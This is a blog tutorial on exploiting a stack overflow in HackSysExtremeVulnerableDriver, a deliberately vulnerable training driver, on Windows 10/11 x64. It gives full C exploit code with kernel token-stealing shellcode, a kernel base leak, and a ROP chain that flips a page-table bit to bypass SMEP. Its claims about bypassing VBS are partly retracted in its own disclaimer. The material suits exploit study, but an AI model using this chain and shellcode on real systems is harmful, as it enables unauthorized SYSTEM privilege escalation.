This post was made possible through hard work and determination. Do not feel frustrated if this stuff does not click immediately and remember, the source of truth will always be the source code. For us, our source code is raw assembly. That said it’s important you understand these techniques in detail because when Microsoft releases new mitigations your foundation is what will allow you to develop bypasses. So, if something is not clear take your time and step through it in the debugger.

In the last post you should have obtained a solid understanding of the basics of Windows Kernel Exploitation. We will now be jumping off the deep end and exploiting Windows 10 (x64) and Windows 11 (x64). Within this post you will be getting an introduction to some of the latest exploit mitigations offered by Microsoft and how “easily” they can be bypassed. That said only SOME will be covered, more exist but we will only cover them when relevant within this series.

In addition, this post will include the release of my PoC ROP chain - Violet Phosphorus, a universal VBS/SMEP bypass technique.

To prove its effectiveness, I went ahead and deployed Violet Phosphorus against Windows 11 24H2 just for this post. If I understand correctly, this is the latest version of Windows 11, released on October 1st, 2024.

DISCLAIMER: TO BE CLEAR THIS DOES NOT BYPASS HVCI, AT THE TIME OF WRITING I BELIEVED THIS TO BYPASS HVCI. THIS POST ONLY CONTAINS A SMEP BYPASS. ADDITIONALLY EXPLOITS IN THIS SERIES WERE TESTED PRIMARILY ON: WINDOWS 11 (x64) - 10.0.22000 N/A Build 22000


Entering the Modern Landscape

Since we already exploited the Stack Overflow on Windows 7 (x86) and went in depth on its underlying operations, there is no need to rehash the vulnerability, at least not for this type of bug. That said, we can go ahead and jump straight into exploit development for Windows 10 (x64).

As mentioned in the last post, we will shift languages and use C rather than Python. If you’re using Kali and want to follow along with me, install mingw-w64, as this is what I will be using to compile my exploit code. You can also use Visual Studio; it really comes down to preference.

sudo apt install mingw-w64 -y

If you’re still new to C, the following can also be accomplished in Python. I intentionally used Python in the last post for those who want to jump in without using C. However, you will see that the further you get into exploit development, the less optional knowledge of C becomes. That said, let’s look at our initial PoC code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>

#define BUFFER_SIZE 4242

int main()
{
    HANDLE hHEVD                = NULL;
    DWORD bytesReturned         = 0;
    char buffer[BUFFER_SIZE]    = {0};

    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Generating evil buffer...\n");
    memset(buffer, 'A', 3000);

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    0x222003,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);
}

We can compile it from within Linux using the mingw-w64 cross compiler (x86_64-w64-mingw32-gcc poc.c -o poc.exe). Once sent, we can see that we have successfully achieved memory corruption :)

alt text

Let’s update the PoC; this time we’ll include shellcode (generated with Sickle).

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

#include <windows.h>

#define BUFFER_SIZE 4242

int main()
{
    HANDLE hHEVD = NULL;
    LPVOID lpMemory = NULL;
    DWORD bytesReturned = 0;

    int i = 0;
    int shellcodeLength = 62;
    int64_t buffer[BUFFER_SIZE] = {0};

    char shellcode[] =
    // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint

    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x48\x8b\x80\xb8\x00\x00\x00"                 // mov rax, qword ptr [rax + 0xb8]
    "\x48\x89\xc1"                                 // mov rcx, rax
    "\xb2\x04"                                     // mov dl, 4
    "\x48\x8b\x80\x48\x04\x00\x00"                 // mov rax, qword ptr [rax + 0x448]
    "\x48\x2d\x48\x04\x00\x00"                     // sub rax, 0x448
    "\x38\x90\x40\x04\x00\x00"                     // cmp byte ptr [rax + 0x440], dl
    "\x75\xeb"                                     // jne 0x1017
    "\x48\x8b\x90\xb8\x04\x00\x00"                 // mov rdx, qword ptr [rax + 0x4b8]
    "\x48\x89\x91\xb8\x04\x00\x00"                 // mov qword ptr [rcx + 0x4b8], rdx

    "\x5d"          // pop rbp
    "\xc2\x08\x00"; // ret 8


    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Allocating RWX memory\n");
    lpMemory = VirtualAlloc(NULL,
                            shellcodeLength,
                            (MEM_COMMIT | MEM_RESERVE),
                            PAGE_EXECUTE_READWRITE);

    printf("[*] Copying shellcode into RWX memory\n");
    memcpy(lpMemory, shellcode, shellcodeLength);

    printf("[*] Spraying return address: 0x%p\n", lpMemory);
    for (i = 0; i < 270; i++)
    {
        /* Spray the return address, who cares about accuracy ;) */
        buffer[i] = (int64_t)lpMemory;
    }

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    0x222003,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);
}

Let’s try to allocate memory as we did before in Windows 7 (x86). When we jump to it we get the following error:

alt text

After a bit of research on the error, we can confirm we’re dealing with SMEP (Supervisor Mode Execution Prevention), a CPU feature that Windows has enabled by default since Windows 8. If you’re familiar with userland exploitation, think of it as DEP, except that it stops code running in kernel mode from executing pages that belong to user mode. This is oversimplifying it, but for the sake of this tutorial we won’t dive any deeper. All we need to do is find a way to bypass it; that is our objective.

Bypassing SMEP (Theory)

To bypass SMEP we’re likely going to need to deploy some ROP, just as we would if we encountered DEP in a user-mode context. If you’re familiar with Linux Kernel exploitation your brain might also go to SMAP. This is good since we’ll be dealing with bits. In short, SMEP is enabled by setting bit 20 of the CR4 register (counting from bit 0, mask 0x100000). In theory, this register can be modified by code running in the Kernel, which is why ROP is an ideal technique to deploy.

Let’s look at this in WinDbg.

alt text

Flipping a bit of any number changes its value. To see what value CR4 would hold with the SMEP bit flipped, I wrote a simple C program to generate the number for me. The code can be seen below:

/* wetw0rk */

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>

// https://stackoverflow.com/questions/111928/is-there-a-printf-converter-to-print-in-binary-format
#define PRINTF_BINARY_PATTERN_INT8 "%c%c%c%c%c%c%c%c "
#define PRINTF_BYTE_TO_BINARY_INT8(i)    \
    (((i) & 0x80ll) ? '1' : '0'), \
    (((i) & 0x40ll) ? '1' : '0'), \
    (((i) & 0x20ll) ? '1' : '0'), \
    (((i) & 0x10ll) ? '1' : '0'), \
    (((i) & 0x08ll) ? '1' : '0'), \
    (((i) & 0x04ll) ? '1' : '0'), \
    (((i) & 0x02ll) ? '1' : '0'), \
    (((i) & 0x01ll) ? '1' : '0')

#define PRINTF_BINARY_PATTERN_INT16 \
    PRINTF_BINARY_PATTERN_INT8              PRINTF_BINARY_PATTERN_INT8
#define PRINTF_BYTE_TO_BINARY_INT16(i) \
    PRINTF_BYTE_TO_BINARY_INT8((i) >> 8),   PRINTF_BYTE_TO_BINARY_INT8(i)
#define PRINTF_BINARY_PATTERN_INT32 \
    PRINTF_BINARY_PATTERN_INT16             PRINTF_BINARY_PATTERN_INT16
#define PRINTF_BYTE_TO_BINARY_INT32(i) \
    PRINTF_BYTE_TO_BINARY_INT16((i) >> 16), PRINTF_BYTE_TO_BINARY_INT16(i)
#define PRINTF_BINARY_PATTERN_INT64    \
    PRINTF_BINARY_PATTERN_INT32             PRINTF_BINARY_PATTERN_INT32
#define PRINTF_BYTE_TO_BINARY_INT64(i) \
    PRINTF_BYTE_TO_BINARY_INT32((i) >> 32), PRINTF_BYTE_TO_BINARY_INT32(i)

/*
 * flip_bit: flip a single bit (zero-indexed); for CR4.SMEP this is bit 20
 */
uint64_t flip_bit(uint64_t cr4, unsigned int bit_position)
{
  /* 64-bit mask so that positions above 31 would also work */
  uint64_t mask = 1ULL << bit_position;
  return (cr4 ^ mask);
}

int main(int argc, char *argv[])
{
  uint64_t num = 0;

  if (argc < 2) {
    printf("Usage: %s <current cr4 value>\n", argv[0]);
    return -1;
  }

  num = strtoull(argv[1], NULL, 0);

  printf("OLD CR4:\n\n\t");
  printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num));
  putchar('\n');

  num = flip_bit(num, 20);

  printf("NEW CR4\n\n\t");
  printf(PRINTF_BINARY_PATTERN_INT64, PRINTF_BYTE_TO_BINARY_INT64(num));
  putchar('\n');

  printf("\nResult: 0x%llx\n", (unsigned long long)num);
}

Let’s run it.

$ ./get_cr4 0x0000000000b50ef8
OLD CR4:

        00000000 00000000 00000000 00000000 00000000 10110101 00001110 11111000 
NEW CR4

        00000000 00000000 00000000 00000000 00000000 10100101 00001110 11111000 

Result: 0xa50ef8

So basically we have to place this value into CR4 to turn off SMEP… While researching this I came across a blog post by fluidattacks and noticed the author used a ROP gadget in the nt module, specifically within KeFlushCurrentTb. We can get the version running on our target using vertarget in WinDbg. On our target, this was the installed Windows version:

alt text

That said, this gadget would not be available to us. If we check other similar functions, we find a comparable gadget within nt!KeFlushCurrentTbImmediately, the main difference being that RCX is used to modify CR4 instead of EAX:

alt text

Since addresses are randomized, we need to calculate the offset of that ROP gadget from the start of the nt module:

alt text

Here we see the offset is 0x000000000039dc27.

Finding & Using ROP Gadgets

Now we need to find a pop rcx; ret gadget to place the new CR4 value into RCX. We can find one using rp++, which has quickly become my favorite ROP gadget tool. Here we search for gadgets within ntoskrnl.exe since this is the primary kernel file for the Windows OS. To do this you can use the following syntax:

rp-win.exe --rop=50 --va=0 --file C:\Windows\System32\ntoskrnl.exe > rop.txt

We can then parse the results using PowerShell.

alt text

Using these offsets we can confirm we have a working gadget in WinDbg.

alt text

However, we still have to deal with the randomization of the nt module itself…

Finding the Kernel Base Address

If you had peeked into my brain during this period of learning, you would have observed unadulterated fear, since in a user-mode exploit you would normally need a read primitive at this point to get the base address of a loaded module. However, with a little bit of research you’ll find there are multiple methods to obtain the base address of nt (or any other loaded module, for that matter) from medium integrity (the default user configuration).

I ended up using a known method of leveraging EnumDeviceDrivers to obtain the base address.

The code I used can be seen below:

ULONG_PTR GetKernelBaseAddress()
{
    ULONG_PTR pKernelBaseAddress = 0;
    LPVOID *lpImageBase = NULL;
    DWORD dwBytesNeeded = 0;

    /* First call only reports how many bytes the driver list requires */
    if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) {
        printf("[-] Failed to calculate bytes needed for device driver entries\n");
        return 0;
    }

    if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) {
        printf("[-] Failed to allocate heap for lpImageBase\n");
        return 0;
    }

    if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) {
        printf("[-] EnumDeviceDrivers: %lu\n", GetLastError());
        HeapFree(GetProcessHeap(), 0, lpImageBase);
        return 0;
    }

    /* The first entry is expected to be the kernel image (nt) */
    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0];
    HeapFree(GetProcessHeap(), 0, lpImageBase);

    printf("[*] Kernel Base Address: %llx\n", (unsigned long long)pKernelBaseAddress);

    /* Return the full 64-bit address; an int would truncate it */
    return pKernelBaseAddress;
}

With that we should have everything needed to get code execution! Right? Wrong :(

alt text

When putting everything together, we get the error above (ignore the different gadget location; I tried changing it at this point because I could not fathom this not working).

What happened? Well… it looks like we encountered a new memory protection that I had not heard of. We’ve run into Virtualization-Based Security (VBS), which means any “unauthorized modifications of the CR4 control register bitfields, including the SMEP field, are blocked instantly”.

Bypassing VBS (Theory)

After a bit of research into how others have approached this, the idea is to flip a bit within the Page Table Entry (PTE) that maps our user-mode shellcode.

If we recall when we tried to execute the shellcode directly we got the following error:

alt text

Basically, SMEP is enforced on a per-page basis via the U/S (User/Supervisor) control bit of the PTE. Let’s look at the output of !pte in WinDbg for the user-mode shellcode allocation to understand the page table entry permissions.

alt text

So what would happen if we were to clear the user-mode bit (U)? Once flipped, this page in theory becomes a Kernel-mode page. The bit location of U can be seen below.

alt text

Let’s set a breakpoint at HEVD+0x866b9 and reboot to test this. Once our breakpoint is hit, we can modify the PTE as shown below. Once execution is continued, you can see we successfully get code execution as we overwrite RAX with 0xDEADBEEF (pseudo shellcode).

alt text

Sweet, we have a solid bypass route for SMEP and VBS but how can we do this dynamically…

Violet Phosphorus

With our analysis complete, I decided to put my theory into practice and created Violet Phosphorus, a universal and generic SMEP/VBS bypass. Can we call this the successor of the White Phosphorus Exploit Pack? Or would that be too much… you can find the ROP chain below:

  /* Prepare RDX for later. The final XOR gadget writes to [rbx+0x08], so we
     subtract 0x08 from the PTE address before moving it into RBX */
  buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
  buffer[i++] =               0x000008; // RDX = 0x08, subtracted from RAX once MiGetPteAddress returns
  buffer[i++] =               0x000000; // [filler]
  buffer[i++] =               0x000000; // [filler]

  /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
     userland code. The setup is as follows:
  
       RAX -> VOID *MiGetPteAddress(
         ( RCX == PTE / Userland Code )
       );

     Once the call is complete RAX should contain the pointer to our PTE. */
  buffer[i++] = kernel_base + 0xa74d93; // pop rcx ; ret     [nt]
  buffer[i++] = (int64_t)shellcode;     // address of our user-mode shellcode
  buffer[i++] = kernel_base + 0x26b560; // MiGetPteAddress() [nt]

  /* Now that we have obtained the PTE address, we can flip bit 2 (the U/S bit, mask 0x4)
     in order to mark the page as a kernel page (U -> K). We can do this using XOR ;) */
  buffer[i++] = kernel_base + 0x2ffbfb; // sub rax, rdx ; ret                [nt]
  buffer[i++] = kernel_base + 0xa6f2f5; // push rax ; pop rbx ; ret          [nt]
  buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
  buffer[i++] =               0x000004; // XORing the PTE with 0x4 flips bit 2 (U -> K)
  buffer[i++] =               0x000000; // [filler]
  buffer[i++] =               0x000000; // [filler]
  buffer[i++] = kernel_base + 0x2107b2; // xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret [nt]

Understanding the ROP Chain

Let’s be honest, there exist other ways to bypass VBS/SMEP, but from what I’ve seen most require a leak. Why suffer when Microsoft gives us a function to get this information dynamically? Below is the ASM code within WinDbg of the MiGetPteAddress() function.

0: kd> u nt!MiGetPteAddress
nt!MiGetPteAddress:
fffff800`4d67f770 48c1e909                shr     rcx,9
fffff800`4d67f774 48b8f8ffffff7f000000    mov rax,7FFFFFFFF8h
fffff800`4d67f77e 4823c8                  and     rcx,rax
fffff800`4d67f781 48b80000000080f0ffff    mov rax,0FFFFF08000000000h
fffff800`4d67f78b 4803c1                  add     rax,rcx
fffff800`4d67f78e c3                      ret

From what I’ve seen in the “wild”, people normally use this function to get the base address of all PTE’s. Let’s take a step back and ask ourselves what does this function actually do when called? We don’t even need Ghidra for this to be honest. Let’s write the C equivalent to this:

/* wetw0rk */

#include <stdio.h>
#include <stdint.h>

int64_t MiGetPteAddress(int64_t rcx)
{
    int64_t rax = 0x00;

    rcx = rcx >> 9;
    rax = 0x7FFFFFFFF8;
    rcx = rcx & rax;
    rax = 0x0FFFFF08000000000;
    rax = rax + rcx;
    return rax;
}

int main() {
    printf("PTE Located @{ 0x%llx }\n", MiGetPteAddress(0x00000220c16d0000));
}

If we compile and run this, we see it gives us the address of the PTE.

┌──(wetw0rk㉿kali)-[~]
└─$ gcc MiGetPteAddress.c -o meme

┌──(wetw0rk㉿kali)-[~]
└─$ ./meme 
PTE Located @{ 0xfffff0811060b680 }

This means we can leverage this existing function to manipulate the PTE directly. After all, we are running under the context of the Kernel so we can call Bill Gates if we want to. To summarize all we need to do is pass this function the address of our shellcode and in return this function will return the PTE respective to our allocation. How nice :)

Once we have the address of the PTE, we simply dereference it and flip the U bit to a K bit. What insane mathematical operation must we do to accomplish such a task?

That’s right - XOR!

>>> "0x" + hex(0x0000000226D83867 ^ 4)[2:].zfill(16)
'0x0000000226d83863'

You know what this means right?

alt text

Crafting a PoC

At this point we have everything we need to get code execution… except returning to Userland. Normally it’s best to restore execution flow manually. However, I decided to instead use Kristal-G’s SYSRET shellcode - a technique that allows for a generic return from the Kernel. From my understanding this is the first of its kind (other than the Linux variant). You can generate Kristal-G’s shellcode using Sickle as shown below:

┌──(wetw0rk㉿kali)-[/opt/Sickle/src]
└─$ python3 sickle.py -p windows/x64/kernel_sysret -f c -m pinpoint
"\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
"\x66\x8b\x88\xe4\x01\x00\x00"                 // mov cx, word ptr [rax + 0x1e4]
"\x66\xff\xc1"                                 // inc cx
"\x66\x89\x88\xe4\x01\x00\x00"                 // mov word ptr [rax + 0x1e4], cx
"\x48\x8b\x90\x90\x00\x00\x00"                 // mov rdx, qword ptr [rax + 0x90]
"\x48\x8b\x8a\x68\x01\x00\x00"                 // mov rcx, qword ptr [rdx + 0x168]
"\x4c\x8b\x9a\x78\x01\x00\x00"                 // mov r11, qword ptr [rdx + 0x178]
"\x48\x8b\xa2\x80\x01\x00\x00"                 // mov rsp, qword ptr [rdx + 0x180]
"\x48\x8b\xaa\x58\x01\x00\x00"                 // mov rbp, qword ptr [rdx + 0x158]
"\x31\xc0"                                     // xor eax, eax
"\x0f\x01\xf8"                                 // swapgs 
"\x48\x0f\x07"                                 // sysretq

Below is the PoC code, however offsets may be different on your build of Windows.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#include <windows.h>
#include <psapi.h>

// IOCTL code that triggers the vulnerable stack overflow handler
#define TRIGGER_BUFFER_OVERFLOW_STACK 0x222003

#define BUFFER_SIZE 4242

uint64_t GetKernelBaseAddress()
{
    ULONG_PTR pKernelBaseAddress = 0;
    LPVOID *lpImageBase = NULL;
    DWORD dwBytesNeeded = 0;

    if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) {
        printf("[-] Failed to calculate bytes needed for device driver entries");
        return -1;
    }

    if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) {
        printf("[-] Failed to allocate heap for lpImageBase\n");
        if (lpImageBase) {
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        }
        return -1;
    }

    if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) {
        printf("[-] EnumDeviceDrivers: %d", GetLastError());
        if (lpImageBase) {
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        }
        return -1;
    }

    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0];
    HeapFree(GetProcessHeap(), 0, lpImageBase);

    printf("[*] Kernel Base Address: %llx\n", pKernelBaseAddress);

    return pKernelBaseAddress;
}

void GenerateBuffer(int64_t *buffer, int64_t kernel_base, LPVOID shellcode)
{
    int64_t i = 259;
    int64_t j = 0;

    printf("[*] Generating buffer to bypass VBS and SMEP\n");

    /* Prepare RDX for later. The final XOR gadget writes to [rbx+0x08], so we
       subtract 0x08 from the PTE address before moving it into RBX */
    buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
    buffer[i++] =               0x000008; // RDX = 0x08, subtracted from RAX once MiGetPteAddress returns
    buffer[i++] =               0x000000; // [filler]
    buffer[i++] =               0x000000; // [filler]

    /* Setup the call to MiGetPteAddress in order to get the address of the PTE for our
       userland code. The setup is as follows:
  
         RAX -> VOID *MiGetPteAddress(
           ( RCX == PTE / Userland Code )
         );

       Once the call is complete RAX should contain the pointer to our PTE. */
    buffer[i++] = kernel_base + 0xa74d93; // pop rcx ; ret     [nt]
    buffer[i++] = (int64_t)shellcode;     // address of our user-mode shellcode
    buffer[i++] = kernel_base + 0x26b560; // MiGetPteAddress() [nt]

    /* Now that we have obtained the PTE address, we can flip bit 2 (the U/S bit, mask 0x4)
       in order to mark the page as a kernel page (U -> K). We can do this using XOR ;) */
    buffer[i++] = kernel_base + 0x2ffbfb; // sub rax, rdx ; ret                [nt]
    buffer[i++] = kernel_base + 0xa6f2f5; // push rax ; pop rbx ; ret          [nt]
    buffer[i++] = kernel_base + 0x3f99ce; // pop rdx ; pop rax ; pop rcx ; ret [nt]
    buffer[i++] =               0x000004; // XORing the PTE with 0x4 flips bit 2 (U -> K)
    buffer[i++] =               0x000000; // [filler]
    buffer[i++] =               0x000000; // [filler]
    buffer[i++] = kernel_base + 0x2107b2; // xor  [rbx+0x08], edx ; mov rbx, qword [rsp+0x60] ; add rsp, 0x40 ; pop r14 ; pop rdi ; pop rbp ; ret [nt]

    /* Now we can spray our shellcode address since SMEP and VBS should be bypassed */
    for (j = 0; j < 0xC; j++) {
        buffer[i++] = (int64_t)shellcode;
    }

    printf("[*] Calling shellcode: 0x%p\n", shellcode);
}

int main()
{
    HANDLE hHEVD                          = NULL;
    DWORD bytesReturned                   = 0;
    int64_t buffer[BUFFER_SIZE]           = {0};
    int64_t kernelBaseAddr                = 0;
    LPVOID lpMemory                       = NULL;

    char shellcode[] =
    // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint
    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x48\x8b\x80\xb8\x00\x00\x00"                 // mov rax, qword ptr [rax + 0xb8]
    "\x48\x89\xc1"                                 // mov rcx, rax
    "\xb2\x04"                                     // mov dl, 4
    "\x48\x8b\x80\x48\x04\x00\x00"                 // mov rax, qword ptr [rax + 0x448]
    "\x48\x2d\x48\x04\x00\x00"                     // sub rax, 0x448
    "\x38\x90\x40\x04\x00\x00"                     // cmp byte ptr [rax + 0x440], dl
    "\x75\xeb"                                     // jne 0x1017
    "\x48\x8b\x90\xb8\x04\x00\x00"                 // mov rdx, qword ptr [rax + 0x4b8]
    "\x48\x89\x91\xb8\x04\x00\x00"                 // mov qword ptr [rcx + 0x4b8], rdx
 
    // python3 sickle.py -p windows/x64/kernel_sysret -f c -m pinpoint
    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x66\x8b\x88\xe4\x01\x00\x00"                 // mov cx, word ptr [rax + 0x1e4]
    "\x66\xff\xc1"                                 // inc cx
    "\x66\x89\x88\xe4\x01\x00\x00"                 // mov word ptr [rax + 0x1e4], cx
    "\x48\x8b\x90\x90\x00\x00\x00"                 // mov rdx, qword ptr [rax + 0x90]
    "\x48\x8b\x8a\x68\x01\x00\x00"                 // mov rcx, qword ptr [rdx + 0x168]
    "\x4c\x8b\x9a\x78\x01\x00\x00"                 // mov r11, qword ptr [rdx + 0x178]
    "\x48\x8b\xa2\x80\x01\x00\x00"                 // mov rsp, qword ptr [rdx + 0x180]
    "\x48\x8b\xaa\x58\x01\x00\x00"                 // mov rbp, qword ptr [rdx + 0x158]
    "\x31\xc0"                                     // xor eax, eax
    "\x0f\x01\xf8"                                 // swapgs 
    "\x48\x0f\x07";                                // sysretq


    int shellcodeLength = (58 + 71);

    kernelBaseAddr = GetKernelBaseAddress();

    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Allocating RWX memory\n");
    lpMemory = VirtualAlloc(NULL,
                            shellcodeLength,
                            (MEM_COMMIT | MEM_RESERVE),
                            PAGE_EXECUTE_READWRITE);

    printf("[*] Copying shellcode into RWX memory\n");
    memcpy(lpMemory, shellcode, shellcodeLength);

    printf("[*] Spraying return address: 0x%p\n", lpMemory);
    GenerateBuffer(buffer, kernelBaseAddr, lpMemory);

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    TRIGGER_BUFFER_OVERFLOW_STACK,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);

    system("C:\\Windows\\System32\\cmd.exe");
}

Exploitation (Rip & Tear)

When writing this post I was so confident in my technique I decided to weaponize it and test it against the latest build of Windows 11, and it worked!

alt text

It’s important to keep in mind that I had to modify the aforementioned information. As an example, the Token Stealing Shellcode offsets have changed. This was an interesting observation, and I plan to update the shellcode within Sickle to perform version checking for accurate structure offsets.

Sources

https://connormcgarr.github.io/pte-overwrites/
https://m0uk4.gitbook.io/notebooks/mouka/windowsinternal/find-kernel-module-address-todo
https://wumb0.in/finding-the-base-of-the-windows-kernel.html
https://idafchev.github.io/research/2023/06/30/Vulnerable_Driver_Part2.html
https://fluidattacks.com/blog/hevd-smep-bypass/
https://h0mbre.github.io/HEVD_Stackoverflow_SMEP_Bypass_64bit/#
https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf
https://kristal-g.github.io/2021/02/07/HEVD_StackOverflowGS_Windows_10_RS5_x64.html